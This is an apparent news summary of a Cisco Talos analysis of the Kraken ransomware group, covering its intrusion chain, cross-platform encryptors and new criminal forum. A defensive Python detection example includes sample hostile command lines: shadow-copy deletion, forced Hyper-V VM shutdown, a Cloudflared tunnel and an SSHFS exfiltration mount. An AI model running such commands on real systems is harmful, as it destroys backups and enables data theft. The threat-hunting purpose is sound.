Cisco Talos has released a detailed new analysis showing that the Kraken ransomware group—a successor to the infamous HelloKitty cartel—is rapidly expanding its operations, adopting advanced tooling, and targeting enterprise systems across Windows, Linux, and VMware ESXi environments.
Kraken has already been implicated in attacks across the United States, United Kingdom, Canada, Denmark, Panama, and Kuwait—reflecting broad, opportunistic targeting rather than a focus on any specific sector.
Talos notes that Kraken first appeared in February 2025 and uses the same extortion infrastructure style as its predecessor: “Kraken, a Russian-speaking gang, is suspected to have emerged from the ashes of the HelloKitty ransomware cartel or to have been established by some of its former members.”
Both groups even use the same ransom note filename, reinforcing the overlap. Kraken’s leak site plays a central role in its extortion strategy: “Kraken also operates a data leak site to disclose the stolen data of victims who do not meet their ransom demands.”
In one case investigated by Talos, the group demanded $1 million in Bitcoin, stating that victims must pay to prevent their data from being posted publicly.

One of the analyzed intrusions shows Kraken exploiting exposed SMB services: “Talos observed in one intrusion that the Kraken actor exploited Server Message Block (SMB) vulnerabilities for initial access.”
After breaching the first server, Kraken:
- Extracted administrator credentials
- Logged back in via Remote Desktop
- Installed Cloudflared to create a persistent reverse tunnel
- Deployed SSHFS to quietly exfiltrate sensitive data
Talos reports, “The attacker established a persistent connection by installing the Cloudflared tool and configuring a reverse tunnel… Additionally, the attacker installed the SSHFS tool… to exfiltrate sensitive data.”
Only after stealing data did the actors unleash the encryption stage—standard practice in double-extortion playbooks.
Cisco Talos emphasizes Kraken’s broad targeting capabilities: “Kraken is a cross-platform ransomware with distinct encryptors for Windows, Linux, and VMware ESXi, targeting a wide range of enterprise environments.” This versatility allows Kraken to hit hybrid, multi-operating-system enterprises with a single toolset.
Kraken appends the .zpsc extension to encrypted files and drops a ransom note titled: readme_you_ws_hacked.txt. In that note, Talos says the threat actor “threatens the victims by stating that they have stolen and encrypted their confidential data.”
Among Kraken’s more unusual capabilities is its ability to evaluate a victim’s system performance before deciding how aggressively to encrypt.
Talos notes: “Kraken ransomware benchmarks a victim machine before starting the encryption process, a feature rarely seen in ransomware.”
By determining whether to perform full or partial encryption based on CPU/IO throughput, Kraken maximizes damage while minimizing the chance of detection through performance spikes. This benchmarking feature is available across both the Windows and Linux/ESXi encryptors.
Kraken’s encryption modules are extensive and highly configurable:
- Encrypt local and removable drives
- Encrypt SQL Server database files
- Encrypt network shares
- Encrypt Hyper-V virtual machines via PowerShell
- Disable backup services
- Delete shadow copies
- Perform multi-threaded operations across directories
Talos highlights Kraken’s operational flexibility: “This ransomware offers extensive command-line options, providing operational flexibility… with features that allow for the encryption of specific files, including SQL databases and network shares.”
Windows and Linux versions also include obfuscation, anti-analysis techniques, and self-cleanup routines to make forensic recovery difficult.
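The intrusion chain above (Cloudflared reverse tunnel, SSHFS exfiltration) and the pre-encryption steps listed here (shadow copy deletion, Hyper-V manipulation via PowerShell) are behaviours a defender can hunt for in process-creation telemetry. The following is an added example, not code from Talos or from the article, that runs simple behaviour rules over constructed sample events and correlates hits per host; the hostnames, user names and command lines are invented for illustration.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (invented for this example,
# not telemetry from the Talos investigation).
EVENTS = [
    {"host": "srv01", "user": "admin", "image": "cloudflared.exe",
     "cmdline": "cloudflared.exe tunnel run --token <redacted>"},
    {"host": "srv01", "user": "admin", "image": "sshfs.exe",
     "cmdline": "sshfs.exe user@203.0.113.5:/stage Z:"},
    {"host": "srv01", "user": "admin", "image": "vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "srv01", "user": "admin", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Get-VM | Stop-VM -Force"},
    {"host": "ws07", "user": "alice", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Get-Process"},
]

# Behaviour rules drawn from the tradecraft described in the article:
# Cloudflared tunnel, SSHFS mount, shadow-copy deletion, Hyper-V via PowerShell.
RULES = {
    "cloudflared_tunnel": re.compile(r"cloudflared(\.exe)?\s+tunnel", re.I),
    "sshfs_mount": re.compile(r"\bsshfs(\.exe)?\b", re.I),
    "shadow_copy_deletion": re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    "hyperv_powershell": re.compile(r"powershell.*\b(Get-VM|Stop-VM|Get-VHD)\b", re.I),
}


def match_rules(event):
    """Return the names of every rule whose pattern matches this event's command line."""
    return [name for name, rx in RULES.items() if rx.search(event["cmdline"])]


def correlate(events, threshold=3):
    """Group distinct rule hits per host. A host that shows at least `threshold`
    different behaviours (tunnel + exfil + backup destruction, for instance)
    is reported as a likely pre-encryption stage rather than an isolated admin action."""
    hits = defaultdict(set)
    for ev in events:
        for name in match_rules(ev):
            hits[ev["host"]].add(name)
    return {host: sorted(names) for host, names in hits.items() if len(names) >= threshold}


if __name__ == "__main__":
    for host, names in correlate(EVENTS).items():
        print(f"{host}: {', '.join(names)}")
```

Any single hit (an administrator legitimately running SSHFS, say) stays below the threshold; it is the combination on one host within the same window that mirrors the sequence Talos describes.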
In a move that signals organizational growth, Kraken is attempting to build its own darknet community.
According to Talos, “Talos also observed the announcement of a new underground forum, ‘The Last Haven Board,’ on Kraken’s data leak blog, aimed at creating an anonymous and secure communication channel for the cybercrime underground.”
The Last Haven Board is said to have support from:
- Former HelloKitty affiliates
- The WeaCorp exploit-buying group
This suggests Kraken is trying to position itself not just as a ransomware group—but as an ecosystem hub for cybercriminal activity.